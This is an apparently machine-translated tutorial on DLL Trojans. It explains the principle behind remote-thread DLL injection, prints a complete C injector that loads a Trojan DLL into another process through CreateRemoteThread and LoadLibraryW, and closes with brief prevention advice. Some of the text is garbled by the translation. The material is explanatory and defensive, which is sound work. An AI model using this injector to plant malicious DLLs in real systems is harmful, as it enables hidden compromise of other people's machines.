Dll can make a huge contribution in programming, it provides the ability to reuse common code. However, just as an advanced martial arts school, if it is in the hands of the man of justice, it can help it to justify the rivers and lakes; but if it is in the hands of evil, it will inevitably cause a storm in the rivers and lakes. DLL is such a martial art. Once the DLL is infected with the magic, it is no longer a normal DLL program, but a DLL Trojan, a virus that is full of evil, so that the country broke down throughout the night.
Principle of DLL Trojan
The implementation principle of the DLL Trojan is that the programmer includes the trojan program code in the DLL, then selects a specific target process in the target host, and forces the specified process to call the DLL containing the trojan program in some way, finally, the target system is attacked.
It is the characteristics of the DLL program that determines that loading Trojans in this form is not only feasible, but also has good concealment:
(1) The DLL program is mapped to the address space of the host process. It can share the resources of the host process and illegally access the corresponding system resources at the target host level;
(2) The DLL program does not have an independent process address space, which can avoid leaving "clues" in the target host to conceal itself.
The DLL Trojan implements "true hiding". We cannot see the trojan "process" in the task manager. It is completely integrated into the system kernel. "Fake hidden" corresponds to "fake hidden", and "fake hidden" Trojans register themselves as a service. Although this process cannot be seen in the task manager, the "fake hidden" Trojan essentially has an independent process space. "False hiding" is only applicable to Windows 9X. For WinNT-based operating systems, we can find the services registered in the system through the Service Manager.
DLL Trojans inject other processes to remote threads.
Remote thread insertion technology refers to the process's memory address space by creating a remote thread in another process. After the trojan program is implemented as a DLL, you need to use a remote thread inserted into the target process to insert the trojan dll into the address space of the target process, that is, this thread is used to call the Windows API loadlibrary function to load the trojan dll, thus causing Trojan damage to the system.
DLL Trojan injection program
Createremotethread, a very important Windows API, is involved here. In comparison, the createthread API function we use can only generate a new thread in the process itself, and the newly created thread shares the address space and other resources with the main thread. Createremotethread is different. It can generate threads in other processes! Createremotethread has the following features:
(1) createremotethread has one more hprocess parameter than createthread. this parameter is used to specify the Remote Process of the thread to be created. Its function prototype is:
Handle createremotethread (
Handle hprocess, // Remote Process Handle
Lpsecurity_attributes lpthreadattributes,
Size_t dwstacksize,
Lpthread_start_routine lpstartaddress,
Lpvoid lpparameter,
DWORD dwcreationflags,
Lpdword lpthreadid
);
(2) the code of the thread function cannot be located in the address space where the process we use to inject the DLL Trojan is located. That is to say, we cannot write a function by ourselves and use this function as the entry function of the remote thread;
(3) the pointer of the current process cannot be used as the parameter of createremotethread, because the memory space of the current process is different from that of the remote process.
The following program is simplified by the DLL Trojan injection program of shotgun (Click here to download it. We can see a similar example in the classic book windows core programming ), it transfers troydll under the root directory of drive D. DLL is inserted into the process with ID 4000:
# Include <windows. h>
# Include <stdlib. h>
# Include <stdio. h>
Void checkerror (INT, Int, char *); // error handling function
Pdword pdwthreadid;
Handle hremotethread, hremoteprocess;
DWORD fdwcreate, dwstacksize, dwremoteprocessid;
Pwstr pszlibfileremote = NULL;
Void main (INT argc, char ** argv)
{
Int ireturncode;
Char lpdllfullpathname [max_path];
Wchar pszlibfilename [max_path] = {0 };
Dwremoteprocessid = 4000;
Strcpy (lpdllfullpathname, "d: \ troydll. dll ");
// Convert the full-path ANSI code of the DLL file to the Unicode code
Ireturncode = multibytetowidechar (cp_acp, mb_err_invalid_chars,
Lpdllfullpathname, strlen (lpdllfullpathname ),
Pszlibfilename, max_path );
Checkerror (ireturncode, 0, "multbytetowidechar ");
// Open the Remote Process
Hremoteprocess = OpenProcess (process_create_thread | // allows thread Creation
Process_vm_operation | // allows VM operations
Process_vm_write, // allows VM write
False, dwremoteprocessid );
Checkerror (INT) hremoteprocess, null, "remote process not exist or access denied! ");
// Calculate the memory space required by the dll path name
Int cb = (1 + lstrlenw (pszlibfilename) * sizeof (wchar );
Pszlibfileremote = (pwstr) virtualallocex (hremoteprocess, null, CB, mem_commit, page_readwrite );
Checkerror (INT) pszlibfileremote, null, "virtualallocex ");
// Copy the dll path name to the memory space of the Remote Process
Ireturncode = writeprocessmemory (hremoteprocess, pszlibfileremote, (pvoid) pszlibfilename, CB, null );
Checkerror (ireturncode, false, "writeprocessmemory ");
// Calculate the loadlibraryw entry address
Pthread_start_routine pfnstartaddr = (pthread_start_routine)
Getprocaddress (getmodulehandle (text ("Kernel32"), "loadlibraryw ");
Checkerror (INT) pfnstartaddr, null, "getprocaddress ");
// Start the remote thread and call the user's DLL file through the remote thread
Hremotethread = createremotethread (hremoteprocess, null, 0, pfnstartaddr, pszlibfileremote, 0, null );
Checkerror (INT) hremotethread, null, "Create remote thread ");
// Wait for the remote thread to exit
Waitforsingleobject (hremotethread, infinite );
// Clear the scene
If (pszlibfileremote! = NULL)
{
Virtualfreeex (hremoteprocess, pszlibfileremote, 0, mem_release );
}
If (hremotethread! = NULL)
{
Closehandle (hremotethread );
}
If (hremoteprocess! = NULL)
{
Closehandle (hremoteprocess );
}
}
// Error handling function checkerror ()
Void checkerror (INT ireturncode, int ierrorcode, char * perrormsg)
{
If (ireturncode = ierrorcode)
{
Printf ("% s error: % d \ n", perrormsg, getlasterror ());
// Clear the scene
If (pszlibfileremote! = NULL)
{
Virtualfreeex (hremoteprocess, pszlibfileremote, 0, mem_release );
}
If (hremotethread! = NULL)
{
Closehandle (hremotethread );
}
If (hremoteprocess! = NULL)
{
Closehandle (hremoteprocess );
}
Exit (0 );
}
}
From the source code of the DLL Trojan injection program, we can analyze the general steps of DLL Trojan injection:
(1) obtain the process ID dwremoteprocessid of the host process (that is, the process to which the trojan is injected;
(2) obtain the full path of the DLL and convert it to the wide character mode pszlibfilename;
(3) Use Windows API OpenProcess to open the host process. The following options should be enabled:
A. process_create_thread: Allows creation of threads in the host process;
B. process_vm_operation: Allows VM operations on the host process;
C. process_vm_write: Allows VM write to the host process.
(4) use the Windows API virtualallocex function to allocate the storage space required for DLL full path width characters in the VM of a remote thread, and use the Windows API writeprocessmemory function to write the full path to the storage space;
(5) use the Windows API getprocaddress to obtain the address of the loadlibraryw function in the Kernel32 module. This function will be used as the entry function of the remote thread to be started;
(6) use the Windows API createremotethread to start a remote thread and use the loadlibraryw address as the address of the remote thread's entry function, use the complete dll path stored in the allocated space of the host process as the parameter of the thread entry function to start the specified DLL;
(7) clean up the site.
Prevention and control of DLL Trojans
We learned how to work from the DLL Trojan principle and a simple DLL Trojan program, which can help us better understand the Prevention and Control Measures of the DLL Trojan.
After a trojan is implanted, a network port must be opened to communicate with the attack program. Therefore, the firewall is the best way to defend against Trojan attacks. The firewall can perform packet filtering checks. we allow the firewall to restrict communication ports and only allow the system to accept data requests from specific ports. In this way, even if the trojan is implanted successfully, attackers cannot access the compromised system. The firewall separates the attacker from the Trojan.
For DLL Trojans, a simple observation method may help users discover them. Check the DLL on which the running process depends. If there are some inexplicable DLL, You can assert that the process is a host process and the system is implanted with a DLL Trojan. "A little too high, a little too high", now, DLL Trojans have developed to a higher level, they do not look "inexplicable ". In some of the latest Trojans, advanced DLL trap technology has been adopted. programmers use the trojan dll to replace known system DLL. The trojan dll filters all function calls. For normal calls, the function forwarder is used to forward them directly to the replaced system DLL. For some special situations agreed in advance, dll will perform some corresponding operations.
This article only gives a brief introduction to DLL Trojans. If you are interested in in-depth research, you can refer to other materials.